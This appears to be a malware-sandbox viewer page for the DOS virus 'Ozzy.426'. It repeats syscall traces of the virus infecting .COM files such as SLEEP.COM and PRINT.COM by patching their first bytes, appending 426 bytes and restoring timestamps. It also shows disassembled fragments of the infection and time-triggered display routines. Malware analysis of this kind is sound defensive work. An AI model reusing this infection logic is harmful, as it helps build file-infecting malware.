Sample viewer

vx.netlux.org/Virus.DOS.VCL.Ozzy.426

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:14.17345773Z 71 PC: 12a63 | Get current directory
2018-12-17T23:03:14.177381118Z 26 PC: 12b2f | Set disk transfer address
2018-12-17T23:03:14.179756364Z 78 PC: 12a84 | Find first file
2018-12-17T23:03:14.186674299Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.207685816Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:14.215811026Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.223081938Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.224475473Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.227529383Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.229210002Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.231858849Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.240986547Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.243701557Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.252430306Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.263977568Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.267849711Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.279456506Z 61 PC: 12aaa | Open file (Filename = 'PRINT.COM')
2018-12-17T23:03:14.288004211Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.296275961Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.298161027Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.301425749Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.304019932Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.306950278Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.310544775Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.313148451Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.32169044Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.33292966Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.335364606Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.342556849Z 61 PC: 12aaa | Open file (Filename = 'HELLO.COM')
2018-12-17T23:03:14.346896365Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.351133076Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.352952224Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.355074456Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.356641648Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.360025387Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.369344149Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.37102261Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.380407049Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.391339939Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.394154143Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.408160797Z 61 PC: 12aaa | Open file (Filename = 'PHANG.COM')
2018-12-17T23:03:14.415518415Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.422894058Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.424992426Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.439997916Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.441651533Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.444347385Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.447747656Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.449411988Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.457894545Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.46951687Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.472708013Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.48499379Z 61 PC: 12aaa | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:03:14.493904064Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.501303006Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.503415028Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.507112245Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.508722173Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.511446383Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.515776979Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.517879599Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.526390414Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.537017883Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.539270207Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.546081232Z 61 PC: 12aaa | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:03:14.555821993Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.56516378Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.56889358Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.577598278Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.57952109Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.583680026Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.598080144Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.601357069Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.610282123Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.621888982Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.626170011Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.637670801Z 61 PC: 12aaa | Open file (Filename = 'PAH.COM')
2018-12-17T23:03:14.645486204Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.654264275Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.658443631Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.664192902Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.673793895Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.677209891Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.681583254Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.685162865Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.693457644Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.704980603Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.709291403Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T23:03:14.720306144Z 61 PC: 12aaa | Open file (Filename = 'TEST.COM')
2018-12-17T23:03:14.728067276Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:14.735786957Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.738612548Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:14.741957653Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:03:14.744524835Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-17T23:03:14.749387953Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-17T23:03:14.759739604Z 87 PC: 12b05 | Get or set file date and time
2018-12-17T23:03:14.761457575Z 62 PC: 12b09 | Close file
2018-12-17T23:03:14.771065063Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T23:03:14.782224041Z 79 PC: 12a84 | Find next file
2018-12-17T23:03:14.784975333Z 59 PC: 12a75 | Change current directory
2018-12-17T23:03:14.790312423Z 59 PC: 12b26 | Change current directory
2018-12-17T23:03:14.792485482Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14467,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:44.584208462Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:44.587640409Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:44.588831115Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:44.594318557Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:44.611325732Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:44.619323896Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:44.624240784Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:44.625540135Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:44.628259771Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.629437716Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-25T12:40:44.631276391Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:44.637672671Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:44.638996524Z 62 PC: 12b09 | Close file
2018-12-25T12:40:44.64970335Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:44.657747907Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.660660944Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.671433796Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.680530025Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.689767931Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.691419198Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.694963847Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.696665306Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.699770871Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.703058287Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.70541783Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.713604271Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.725486558Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.729685832Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.740686092Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.748329096Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.756846689Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.758851058Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.761850177Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.763673695Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.766663256Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.775938462Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.778339807Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.787126699Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.798227395Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.80143774Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.812894137Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.821143363Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.828212181Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.830226779Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.833270917Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.834852164Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.838201485Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.841608902Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.843354308Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.852058649Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.863962196Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.867354595Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.879777661Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.888345415Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.895256148Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.898189416Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.901286204Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.902957433Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.905939715Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.90973872Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.911761653Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.919818075Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.931642567Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.93456788Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.945414176Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.953994581Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.961103938Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.96265451Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.966593185Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.968801122Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.97182855Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.982100185Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.983819691Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.992330868Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.004040891Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.007474263Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.01887794Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.026739822Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.031530456Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.032810465Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.035531736Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.037497339Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.039893123Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.042835336Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.044925241Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.052304313Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.063080909Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.065746658Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.072440013Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.08031936Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.085709057Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.086908879Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.088870844Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.090382523Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.09558857Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.103725909Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.105381451Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.113949115Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.124624071Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.127130069Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.13231581Z 59 PC: 12b26 | Change current directory
2018-12-25T12:40:45.133936316Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b
0x12b3f: jne 0x12b6b
0x12b41: mov bh, 0
0x12b43: mov cx, 0xf00
0x12b46: mov dh, 0xc
0x12b48: mov dl, 5
0x12b4a: mov bl, 1
0x12b4c: push cx
0x12b4d: mov cx, 0x100
0x12b50: push ax
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp
0x12b55: add bp, 0x25f
0x12b59: mov cx, 0x2d
0x12b5c: mov ah, 0x13
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14467,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:44.730697502Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:44.734464625Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:44.735749095Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:44.741987724Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:44.767865541Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:44.775005963Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:44.781387524Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:44.782833548Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:44.785561768Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.786930231Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0
0x12aec: je 0x12ae5
0x12aee: mov byte ptr cs:[bp + 0x292], dh
0x12af3: call 0x12b6c
0x12af6: mov ax, 0x5701
0x12af9: mov dx, word ptr cs:[bp + 0x31c]
0x12afe: mov cx, word ptr cs:[bp + 0x31a]
0x12b03: int 0x21
0x12b05: mov ah, 0x3e
0x12b07: int 0x21
0x12b09: mov ax, 0x4301
0x12b0c: lea dx, word ptr [bp + 0x2cd]
0x12b10: xor ch, ch
0x12b12: mov cl, byte ptr cs:[bp + 0x319]
0x12b17: int 0x21
0x12b19: mov ah, 0x4f
0x12b1b: jmp 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da]
0x12b22: mov ah, 0x3b
0x12b24: int 0x21
2018-12-25T12:40:44.789696495Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:44.799401124Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:44.801287498Z 62 PC: 12b09 | Close file
2018-12-25T12:40:44.817894265Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:44.853674164Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.856654067Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.866444391Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.87391708Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.880589582Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.881761072Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.885901781Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.887427708Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.889631077Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.893036919Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.895539686Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.906694727Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.920066068Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.92265576Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:44.932100102Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:44.942452578Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:44.949110879Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.950801831Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:44.953915339Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:44.95567785Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:44.957996825Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:44.966722115Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:44.968682742Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:44.976595622Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:44.9866266Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:44.990343539Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.000939181Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.007391887Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.015127303Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.016561049Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.019269417Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.021708055Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.024110702Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.026989076Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.030107681Z 62 PC: 12b09 | Close file (See above)
